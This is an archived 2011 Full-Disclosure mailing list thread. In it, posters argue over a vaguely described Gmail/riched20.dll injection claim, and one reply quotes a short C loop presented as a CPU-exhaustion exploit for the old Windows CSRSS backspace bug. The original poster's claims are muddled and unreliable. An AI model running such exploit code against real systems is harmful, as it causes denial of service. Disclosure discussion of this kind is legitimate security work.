lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <BANLkTim_fVjpHpy02dE5P=o3hDtRfM5sgg@mail.gmail.com>
Date: Sun, 12 Jun 2011 11:33:17 +1000
From: "-= Glowing Doom =-" <secn3t@...il.com>
To: Christian Sciberras <uuf6429@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: POC for a simple gmail/possible code
 injection into html wich can be executed in an email,
 i will make the PoC code and explain how here and now...

This is NOT coded..  the PoC i am explaining, is possible with simply
copyying text,then using a sequence of keys, to make the actual sentence/s,
appear.
This code is not what shows up when it is dissected.
It shows up with many x41 all over the email when it is done properly .
Regards.



On 12 June 2011 11:29, Christian Sciberras <uuf6429@...il.com> wrote:

> For those lazy enough to search:
>
>
> https://www.owasp.org/index.php/The_CSRSS_Backspace_Bug_still_works_in_windows_2003_sp1
>
> Excerpt:
>
>  Basicaly just compile this and you will get a 100% processor usage by the
> compiled exploit and Csrss.exe
>
> #include <stdio.h>
> int main(void)
> {
> while(1)
> printf("\t\t\b\b\b\b\b\b");
> return 0;
> }
>
>
> How this helps in sending spam is beyond me.
>
>
>
> On Sun, Jun 12, 2011 at 3:18 AM, Jeffrey Walton <noloader@...il.com>wrote:
>
>> On Sat, Jun 11, 2011 at 9:06 PM, -= Glowing Doom =- <secn3t@...il.com>
>> wrote:
>>
>> > It is now, over 1yr old atleast and exists in riched20.dll.
>> > This PoC info is over for me also.
>> Microsoft had problems with a backspace in the past. Search for "CSRSS
>> Backspace Bug".
>>
>> > [SNIP
>>
>> Jeff
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ